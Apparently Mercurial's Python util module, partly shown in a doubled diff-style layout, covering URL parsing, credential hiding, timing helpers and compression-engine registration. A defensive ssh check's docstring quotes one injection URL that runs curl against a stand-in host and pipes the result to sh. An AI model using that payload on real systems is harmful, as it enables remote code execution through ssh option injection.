2560 >>> url(b'file:///c:/temp/foo/')
2573 >>> url(b'file:///c:/temp/foo/')
2561 <url scheme: 'file', path: 'c:/temp/foo/'>
2574 <url scheme: 'file', path: 'c:/temp/foo/'>
2562 >>> url(b'bundle:foo')
2575 >>> url(b'bundle:foo')
2563 <url scheme: 'bundle', path: 'foo'>
2576 <url scheme: 'bundle', path: 'foo'>
2564 >>> url(b'bundle://../foo')
2577 >>> url(b'bundle://../foo')
2565 <url scheme: 'bundle', path: '../foo'>
2578 <url scheme: 'bundle', path: '../foo'>
2566 >>> url(br'c:\foo\bar')
2579 >>> url(br'c:\foo\bar')
2567 <url path: 'c:\\foo\\bar'>
2580 <url path: 'c:\\foo\\bar'>
2568 >>> url(br'\\blah\blah\blah')
2581 >>> url(br'\\blah\blah\blah')
2569 <url path: '\\\\blah\\blah\\blah'>
2582 <url path: '\\\\blah\\blah\\blah'>
2570 >>> url(br'\\blah\blah\blah#baz')
2583 >>> url(br'\\blah\blah\blah#baz')
2571 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2584 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2572 >>> url(br'file:///C:\users\me')
2585 >>> url(br'file:///C:\users\me')
2573 <url scheme: 'file', path: 'C:\\users\\me'>
2586 <url scheme: 'file', path: 'C:\\users\\me'>
2574
2587
2575 Authentication credentials:
2588 Authentication credentials:
2576
2589
2577 >>> url(b'ssh://joe:xyz@x/repo')
2590 >>> url(b'ssh://joe:xyz@x/repo')
2578 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2591 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2579 >>> url(b'ssh://joe@x/repo')
2592 >>> url(b'ssh://joe@x/repo')
2580 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2593 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2581
2594
2582 Query strings and fragments:
2595 Query strings and fragments:
2583
2596
2584 >>> url(b'http://host/a?b#c')
2597 >>> url(b'http://host/a?b#c')
2585 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2598 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2586 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2599 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2587 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2600 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2588
2601
2589 Empty path:
2602 Empty path:
2590
2603
2591 >>> url(b'')
2604 >>> url(b'')
2592 <url path: ''>
2605 <url path: ''>
2593 >>> url(b'#a')
2606 >>> url(b'#a')
2594 <url path: '', fragment: 'a'>
2607 <url path: '', fragment: 'a'>
2595 >>> url(b'http://host/')
2608 >>> url(b'http://host/')
2596 <url scheme: 'http', host: 'host', path: ''>
2609 <url scheme: 'http', host: 'host', path: ''>
2597 >>> url(b'http://host/#a')
2610 >>> url(b'http://host/#a')
2598 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2611 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2599
2612
2600 Only scheme:
2613 Only scheme:
2601
2614
2602 >>> url(b'http:')
2615 >>> url(b'http:')
2603 <url scheme: 'http'>
2616 <url scheme: 'http'>
2604 """
2617 """
2605
2618
2606 _safechars = "!~*'()+"
2619 _safechars = "!~*'()+"
2607 _safepchars = "/!~*'()+:\\"
2620 _safepchars = "/!~*'()+:\\"
2608 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2621 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2609
2622
2610 def __init__(self, path, parsequery=True, parsefragment=True):
2623 def __init__(self, path, parsequery=True, parsefragment=True):
2611 # We slowly chomp away at path until we have only the path left
2624 # We slowly chomp away at path until we have only the path left
2612 self.scheme = self.user = self.passwd = self.host = None
2625 self.scheme = self.user = self.passwd = self.host = None
2613 self.port = self.path = self.query = self.fragment = None
2626 self.port = self.path = self.query = self.fragment = None
2614 self._localpath = True
2627 self._localpath = True
2615 self._hostport = ''
2628 self._hostport = ''
2616 self._origpath = path
2629 self._origpath = path
2617
2630
2618 if parsefragment and '#' in path:
2631 if parsefragment and '#' in path:
2619 path, self.fragment = path.split('#', 1)
2632 path, self.fragment = path.split('#', 1)
2620
2633
2621 # special case for Windows drive letters and UNC paths
2634 # special case for Windows drive letters and UNC paths
2622 if hasdriveletter(path) or path.startswith('\\\\'):
2635 if hasdriveletter(path) or path.startswith('\\\\'):
2623 self.path = path
2636 self.path = path
2624 return
2637 return
2625
2638
2626 # For compatibility reasons, we can't handle bundle paths as
2639 # For compatibility reasons, we can't handle bundle paths as
2627 # normal URLs
2640 # normal URLs
2628 if path.startswith('bundle:'):
2641 if path.startswith('bundle:'):
2629 self.scheme = 'bundle'
2642 self.scheme = 'bundle'
2630 path = path[7:]
2643 path = path[7:]
2631 if path.startswith('//'):
2644 if path.startswith('//'):
2632 path = path[2:]
2645 path = path[2:]
2633 self.path = path
2646 self.path = path
2634 return
2647 return
2635
2648
2636 if self._matchscheme(path):
2649 if self._matchscheme(path):
2637 parts = path.split(':', 1)
2650 parts = path.split(':', 1)
2638 if parts[0]:
2651 if parts[0]:
2639 self.scheme, path = parts
2652 self.scheme, path = parts
2640 self._localpath = False
2653 self._localpath = False
2641
2654
2642 if not path:
2655 if not path:
2643 path = None
2656 path = None
2644 if self._localpath:
2657 if self._localpath:
2645 self.path = ''
2658 self.path = ''
2646 return
2659 return
2647 else:
2660 else:
2648 if self._localpath:
2661 if self._localpath:
2649 self.path = path
2662 self.path = path
2650 return
2663 return
2651
2664
2652 if parsequery and '?' in path:
2665 if parsequery and '?' in path:
2653 path, self.query = path.split('?', 1)
2666 path, self.query = path.split('?', 1)
2654 if not path:
2667 if not path:
2655 path = None
2668 path = None
2656 if not self.query:
2669 if not self.query:
2657 self.query = None
2670 self.query = None
2658
2671
2659 # // is required to specify a host/authority
2672 # // is required to specify a host/authority
2660 if path and path.startswith('//'):
2673 if path and path.startswith('//'):
2661 parts = path[2:].split('/', 1)
2674 parts = path[2:].split('/', 1)
2662 if len(parts) > 1:
2675 if len(parts) > 1:
2663 self.host, path = parts
2676 self.host, path = parts
2664 else:
2677 else:
2665 self.host = parts[0]
2678 self.host = parts[0]
2666 path = None
2679 path = None
2667 if not self.host:
2680 if not self.host:
2668 self.host = None
2681 self.host = None
2669 # path of file:///d is /d
2682 # path of file:///d is /d
2670 # path of file:///d:/ is d:/, not /d:/
2683 # path of file:///d:/ is d:/, not /d:/
2671 if path and not hasdriveletter(path):
2684 if path and not hasdriveletter(path):
2672 path = '/' + path
2685 path = '/' + path
2673
2686
2674 if self.host and '@' in self.host:
2687 if self.host and '@' in self.host:
2675 self.user, self.host = self.host.rsplit('@', 1)
2688 self.user, self.host = self.host.rsplit('@', 1)
2676 if ':' in self.user:
2689 if ':' in self.user:
2677 self.user, self.passwd = self.user.split(':', 1)
2690 self.user, self.passwd = self.user.split(':', 1)
2678 if not self.host:
2691 if not self.host:
2679 self.host = None
2692 self.host = None
2680
2693
2681 # Don't split on colons in IPv6 addresses without ports
2694 # Don't split on colons in IPv6 addresses without ports
2682 if (self.host and ':' in self.host and
2695 if (self.host and ':' in self.host and
2683 not (self.host.startswith('[') and self.host.endswith(']'))):
2696 not (self.host.startswith('[') and self.host.endswith(']'))):
2684 self._hostport = self.host
2697 self._hostport = self.host
2685 self.host, self.port = self.host.rsplit(':', 1)
2698 self.host, self.port = self.host.rsplit(':', 1)
2686 if not self.host:
2699 if not self.host:
2687 self.host = None
2700 self.host = None
2688
2701
2689 if (self.host and self.scheme == 'file' and
2702 if (self.host and self.scheme == 'file' and
2690 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2703 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2691 raise error.Abort(_('file:// URLs can only refer to localhost'))
2704 raise error.Abort(_('file:// URLs can only refer to localhost'))
2692
2705
2693 self.path = path
2706 self.path = path
2694
2707
2695 # leave the query string escaped
2708 # leave the query string escaped
2696 for a in ('user', 'passwd', 'host', 'port',
2709 for a in ('user', 'passwd', 'host', 'port',
2697 'path', 'fragment'):
2710 'path', 'fragment'):
2698 v = getattr(self, a)
2711 v = getattr(self, a)
2699 if v is not None:
2712 if v is not None:
2700 setattr(self, a, urlreq.unquote(v))
2713 setattr(self, a, urlreq.unquote(v))
2701
2714
2702 @encoding.strmethod
2715 @encoding.strmethod
2703 def __repr__(self):
2716 def __repr__(self):
2704 attrs = []
2717 attrs = []
2705 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2718 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2706 'query', 'fragment'):
2719 'query', 'fragment'):
2707 v = getattr(self, a)
2720 v = getattr(self, a)
2708 if v is not None:
2721 if v is not None:
2709 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2722 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2710 return '<url %s>' % ', '.join(attrs)
2723 return '<url %s>' % ', '.join(attrs)
2711
2724
2712 def __bytes__(self):
2725 def __bytes__(self):
2713 r"""Join the URL's components back into a URL string.
2726 r"""Join the URL's components back into a URL string.
2714
2727
2715 Examples:
2728 Examples:
2716
2729
2717 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2730 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2718 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2731 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2719 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2732 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2720 'http://user:pw@host:80/?foo=bar&baz=42'
2733 'http://user:pw@host:80/?foo=bar&baz=42'
2721 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2734 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2722 'http://user:pw@host:80/?foo=bar%3dbaz'
2735 'http://user:pw@host:80/?foo=bar%3dbaz'
2723 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2736 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2724 'ssh://user:pw@[::1]:2200//home/joe#'
2737 'ssh://user:pw@[::1]:2200//home/joe#'
2725 >>> bytes(url(b'http://localhost:80//'))
2738 >>> bytes(url(b'http://localhost:80//'))
2726 'http://localhost:80//'
2739 'http://localhost:80//'
2727 >>> bytes(url(b'http://localhost:80/'))
2740 >>> bytes(url(b'http://localhost:80/'))
2728 'http://localhost:80/'
2741 'http://localhost:80/'
2729 >>> bytes(url(b'http://localhost:80'))
2742 >>> bytes(url(b'http://localhost:80'))
2730 'http://localhost:80/'
2743 'http://localhost:80/'
2731 >>> bytes(url(b'bundle:foo'))
2744 >>> bytes(url(b'bundle:foo'))
2732 'bundle:foo'
2745 'bundle:foo'
2733 >>> bytes(url(b'bundle://../foo'))
2746 >>> bytes(url(b'bundle://../foo'))
2734 'bundle:../foo'
2747 'bundle:../foo'
2735 >>> bytes(url(b'path'))
2748 >>> bytes(url(b'path'))
2736 'path'
2749 'path'
2737 >>> bytes(url(b'file:///tmp/foo/bar'))
2750 >>> bytes(url(b'file:///tmp/foo/bar'))
2738 'file:///tmp/foo/bar'
2751 'file:///tmp/foo/bar'
2739 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2752 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2740 'file:///c:/tmp/foo/bar'
2753 'file:///c:/tmp/foo/bar'
2741 >>> print(url(br'bundle:foo\bar'))
2754 >>> print(url(br'bundle:foo\bar'))
2742 bundle:foo\bar
2755 bundle:foo\bar
2743 >>> print(url(br'file:///D:\data\hg'))
2756 >>> print(url(br'file:///D:\data\hg'))
2744 file:///D:\data\hg
2757 file:///D:\data\hg
2745 """
2758 """
2746 if self._localpath:
2759 if self._localpath:
2747 s = self.path
2760 s = self.path
2748 if self.scheme == 'bundle':
2761 if self.scheme == 'bundle':
2749 s = 'bundle:' + s
2762 s = 'bundle:' + s
2750 if self.fragment:
2763 if self.fragment:
2751 s += '#' + self.fragment
2764 s += '#' + self.fragment
2752 return s
2765 return s
2753
2766
2754 s = self.scheme + ':'
2767 s = self.scheme + ':'
2755 if self.user or self.passwd or self.host:
2768 if self.user or self.passwd or self.host:
2756 s += '//'
2769 s += '//'
2757 elif self.scheme and (not self.path or self.path.startswith('/')
2770 elif self.scheme and (not self.path or self.path.startswith('/')
2758 or hasdriveletter(self.path)):
2771 or hasdriveletter(self.path)):
2759 s += '//'
2772 s += '//'
2760 if hasdriveletter(self.path):
2773 if hasdriveletter(self.path):
2761 s += '/'
2774 s += '/'
2762 if self.user:
2775 if self.user:
2763 s += urlreq.quote(self.user, safe=self._safechars)
2776 s += urlreq.quote(self.user, safe=self._safechars)
2764 if self.passwd:
2777 if self.passwd:
2765 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2778 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2766 if self.user or self.passwd:
2779 if self.user or self.passwd:
2767 s += '@'
2780 s += '@'
2768 if self.host:
2781 if self.host:
2769 if not (self.host.startswith('[') and self.host.endswith(']')):
2782 if not (self.host.startswith('[') and self.host.endswith(']')):
2770 s += urlreq.quote(self.host)
2783 s += urlreq.quote(self.host)
2771 else:
2784 else:
2772 s += self.host
2785 s += self.host
2773 if self.port:
2786 if self.port:
2774 s += ':' + urlreq.quote(self.port)
2787 s += ':' + urlreq.quote(self.port)
2775 if self.host:
2788 if self.host:
2776 s += '/'
2789 s += '/'
2777 if self.path:
2790 if self.path:
2778 # TODO: similar to the query string, we should not unescape the
2791 # TODO: similar to the query string, we should not unescape the
2779 # path when we store it, the path might contain '%2f' = '/',
2792 # path when we store it, the path might contain '%2f' = '/',
2780 # which we should *not* escape.
2793 # which we should *not* escape.
2781 s += urlreq.quote(self.path, safe=self._safepchars)
2794 s += urlreq.quote(self.path, safe=self._safepchars)
2782 if self.query:
2795 if self.query:
2783 # we store the query in escaped form.
2796 # we store the query in escaped form.
2784 s += '?' + self.query
2797 s += '?' + self.query
2785 if self.fragment is not None:
2798 if self.fragment is not None:
2786 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2799 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2787 return s
2800 return s
2788
2801
2789 __str__ = encoding.strmethod(__bytes__)
2802 __str__ = encoding.strmethod(__bytes__)
2790
2803
2791 def authinfo(self):
2804 def authinfo(self):
2792 user, passwd = self.user, self.passwd
2805 user, passwd = self.user, self.passwd
2793 try:
2806 try:
2794 self.user, self.passwd = None, None
2807 self.user, self.passwd = None, None
2795 s = bytes(self)
2808 s = bytes(self)
2796 finally:
2809 finally:
2797 self.user, self.passwd = user, passwd
2810 self.user, self.passwd = user, passwd
2798 if not self.user:
2811 if not self.user:
2799 return (s, None)
2812 return (s, None)
2800 # authinfo[1] is passed to urllib2 password manager, and its
2813 # authinfo[1] is passed to urllib2 password manager, and its
2801 # URIs must not contain credentials. The host is passed in the
2814 # URIs must not contain credentials. The host is passed in the
2802 # URIs list because Python < 2.4.3 uses only that to search for
2815 # URIs list because Python < 2.4.3 uses only that to search for
2803 # a password.
2816 # a password.
2804 return (s, (None, (s, self.host),
2817 return (s, (None, (s, self.host),
2805 self.user, self.passwd or ''))
2818 self.user, self.passwd or ''))
2806
2819
2807 def isabs(self):
2820 def isabs(self):
2808 if self.scheme and self.scheme != 'file':
2821 if self.scheme and self.scheme != 'file':
2809 return True # remote URL
2822 return True # remote URL
2810 if hasdriveletter(self.path):
2823 if hasdriveletter(self.path):
2811 return True # absolute for our purposes - can't be joined()
2824 return True # absolute for our purposes - can't be joined()
2812 if self.path.startswith(br'\\'):
2825 if self.path.startswith(br'\\'):
2813 return True # Windows UNC path
2826 return True # Windows UNC path
2814 if self.path.startswith('/'):
2827 if self.path.startswith('/'):
2815 return True # POSIX-style
2828 return True # POSIX-style
2816 return False
2829 return False
2817
2830
2818 def localpath(self):
2831 def localpath(self):
2819 if self.scheme == 'file' or self.scheme == 'bundle':
2832 if self.scheme == 'file' or self.scheme == 'bundle':
2820 path = self.path or '/'
2833 path = self.path or '/'
2821 # For Windows, we need to promote hosts containing drive
2834 # For Windows, we need to promote hosts containing drive
2822 # letters to paths with drive letters.
2835 # letters to paths with drive letters.
2823 if hasdriveletter(self._hostport):
2836 if hasdriveletter(self._hostport):
2824 path = self._hostport + '/' + self.path
2837 path = self._hostport + '/' + self.path
2825 elif (self.host is not None and self.path
2838 elif (self.host is not None and self.path
2826 and not hasdriveletter(path)):
2839 and not hasdriveletter(path)):
2827 path = '/' + path
2840 path = '/' + path
2828 return path
2841 return path
2829 return self._origpath
2842 return self._origpath
2830
2843
2831 def islocal(self):
2844 def islocal(self):
2832 '''whether localpath will return something that posixfile can open'''
2845 '''whether localpath will return something that posixfile can open'''
2833 return (not self.scheme or self.scheme == 'file'
2846 return (not self.scheme or self.scheme == 'file'
2834 or self.scheme == 'bundle')
2847 or self.scheme == 'bundle')
2835
2848
2836 def hasscheme(path):
2849 def hasscheme(path):
2837 return bool(url(path).scheme)
2850 return bool(url(path).scheme)
2838
2851
2839 def hasdriveletter(path):
2852 def hasdriveletter(path):
2840 return path and path[1:2] == ':' and path[0:1].isalpha()
2853 return path and path[1:2] == ':' and path[0:1].isalpha()
2841
2854
2842 def urllocalpath(path):
2855 def urllocalpath(path):
2843 return url(path, parsequery=False, parsefragment=False).localpath()
2856 return url(path, parsequery=False, parsefragment=False).localpath()
2844
2857
2845 def checksafessh(path):
2858 def checksafessh(path):
2846 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2859 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2847
2860
2848 This is a sanity check for ssh urls. ssh will parse the first item as
2861 This is a sanity check for ssh urls. ssh will parse the first item as
2849 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2862 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2850 Let's reject these potentially exploitable URLs entirely and warn
2863 Let's reject these potentially exploitable URLs entirely and warn
2851 the user.
2864 the user.
2852
2865
2853 Raises an error.Abort when the url is unsafe.
2866 Raises an error.Abort when the url is unsafe.
2854 """
2867 """
2855 path = urlreq.unquote(path)
2868 path = urlreq.unquote(path)
2856 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2869 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2857 raise error.Abort(_('potentially unsafe url: %r') %
2870 raise error.Abort(_('potentially unsafe url: %r') %
2858 (pycompat.bytestr(path),))
2871 (pycompat.bytestr(path),))
2859
2872
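# Illustrative sketch (not part of the original module): checksafessh
# rejects ssh URLs whose host would be parsed by ssh as an option.
# Doctest-style only; the exact Abort rendering may differ.
#
#     >>> checksafessh(b'ssh://host/repo')      # fine, returns None
#     >>> checksafessh(b'ssh://-oProxyCommand=evil/x')
#     Traceback (most recent call last):
#     ...
#     Abort: potentially unsafe url: 'ssh://-oProxyCommand=evil/x'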
2860 def hidepassword(u):
2873 def hidepassword(u):
2861 '''hide the user credential in a URL string'''
2874 '''hide the user credential in a URL string'''
2862 u = url(u)
2875 u = url(u)
2863 if u.passwd:
2876 if u.passwd:
2864 u.passwd = '***'
2877 u.passwd = '***'
2865 return bytes(u)
2878 return bytes(u)
2866
2879
2867 def removeauth(u):
2880 def removeauth(u):
2868 '''remove all authentication information from a url string'''
2881 '''remove all authentication information from a url string'''
2869 u = url(u)
2882 u = url(u)
2870 u.user = u.passwd = None
2883 u.user = u.passwd = None
2871 return bytes(u)
2884 return bytes(u)
2872
2885
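# Illustrative sketch (not part of the original module): sanitizing
# credentials in URLs before logging or displaying them.
#
#     >>> hidepassword(b'http://alice:secret@example.com/repo')
#     'http://alice:***@example.com/repo'
#     >>> removeauth(b'http://alice:secret@example.com/repo')
#     'http://example.com/repo'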
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )

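# Illustrative only (not part of the original module): assuming
# unitcountfn() (defined earlier in this module) picks the first row whose
# threshold (multiplier * divisor) is met, timecount() renders e.g.:
#
#   timecount(12.0)      -> '12.00 s'   (matches the (10, 1, ...) row)
#   timecount(0.005)     -> '5.000 ms'  (matches the (1, 0.001, ...) row)
#   timecount(0.0000123) -> '12.30 us'  (matches the (10, 0.000001, ...) row)
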
@attr.s
class timedcmstats(object):
    """Stats information produced by the timedcm context manager on entering."""

    # the starting value of the timer as a float (meaning and resolution is
    # platform dependent, see util.timer)
    start = attr.ib(default=attr.Factory(lambda: timer()))
    # the number of seconds as a floating point value; starts at 0, updated when
    # the context is exited.
    elapsed = attr.ib(default=0)
    # the number of nested timedcm context managers.
    level = attr.ib(default=1)

    def __bytes__(self):
        return timecount(self.elapsed) if self.elapsed else '<unknown>'

    __str__ = encoding.strmethod(__bytes__)

@contextlib.contextmanager
def timedcm(whencefmt, *whenceargs):
    """A context manager that produces timing information for a given context.

    On entering, a timedcmstats instance is produced.

    This context manager is reentrant.

    """
    # track nested context managers
    timedcm._nested += 1
    timing_stats = timedcmstats(level=timedcm._nested)
    try:
        with tracing.log(whencefmt, *whenceargs):
            yield timing_stats
    finally:
        timing_stats.elapsed = timer() - timing_stats.start
        timedcm._nested -= 1

timedcm._nested = 0

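# Illustrative usage sketch (not part of the original module); the names
# 'n' and 'dostuff' are hypothetical:
#
#   with timedcm('dostuff %d', n) as stats:
#       dostuff()
#   print('took %s' % bytes(stats))   # stats.elapsed is filled in on exit
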
def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
            result = func(*args, **kwargs)
        stderr = procutil.stderr
        stderr.write('%s%s: %s\n' % (
            ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
            time_stats))
        return result
    return wrapper

_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    t = s.strip().lower()
    try:
        for k, u in _sizeunits:
            if t.endswith(k):
                return int(float(t[:-len(k)]) * u)
        return int(t)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)

class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        self._hooks = []

    def add(self, source, hook):
        self._hooks.append((source, hook))

    def __call__(self, *args):
        self._hooks.sort(key=lambda x: x[0])
        results = []
        for source, hook in self._hooks:
            results.append(hook(*args))
        return results

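# Illustrative usage sketch (not part of the original module); the source
# names are hypothetical and only determine the lexicographic call order:
#
#   h = hooks()
#   h.add('b-source', lambda x: x + 2)
#   h.add('a-source', lambda x: x * 2)
#   h(10)   # calls the 'a-source' hook first -> [20, 12]
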
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then returns the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not to be used in production code but very convenient while developing.
    '''
    entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
               for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
               ][-depth:]
    if entries:
        fnmax = max(len(entry[0]) for entry in entries)
        for fnln, func in entries:
            if line is None:
                yield (fnmax, fnln, func)
            else:
                yield line % (fnmax, fnln, func)

def debugstacktrace(msg='stacktrace', skip=0,
                    f=procutil.stderr, otherf=procutil.stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then shows 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not to be used in production code but very convenient while developing.
    '''
    if otherf:
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    for line in getstackframes(skip + 1, depth=depth):
        f.write(line)
    f.flush()

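# Illustrative usage sketch (not part of the original module):
#
#   util.debugstacktrace('who calls me?', depth=5)
#
# writes something like "who calls me? at:" followed by up to five
# "<file>:<line> in <function>" frames to stderr, flushing stdout first.
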
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        self._dirs = {}
        addpath = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            for f, s in map.iteritems():
                if s[0] != skip:
                    addpath(f)
        else:
            for f in map:
                addpath(f)

    def addpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if base in dirs:
                dirs[base] += 1
                return
            dirs[base] = 1

    def delpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if dirs[base] > 1:
                dirs[base] -= 1
                return
            del dirs[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs

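# Illustrative sketch (not part of the original module): a directory stays
# in the multiset for as long as at least one tracked path lives under it.
#
#   d = dirs([b'a/b/x', b'a/b/y'])
#   b'a/b' in d    # True
#   d.delpath(b'a/b/x')
#   b'a/b' in d    # still True, b'a/b/y' keeps the count above zero
#   d.delpath(b'a/b/y')
#   b'a/b' in d    # False
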
if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs

def finddirs(path):
    pos = path.rfind('/')
    while pos != -1:
        yield path[:pos]
        pos = path.rfind('/', 0, pos)

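# Illustrative sketch (not part of the original module): finddirs() yields
# ancestors from the deepest up, excluding the path itself:
#
#   list(finddirs(b'a/b/c'))   # [b'a/b', b'a']
#   list(finddirs(b'top'))     # []  (no '/' means no parent dirs)
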
# compression code

SERVERROLE = 'server'
CLIENTROLE = 'client'

compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))

class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # No external facing name declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
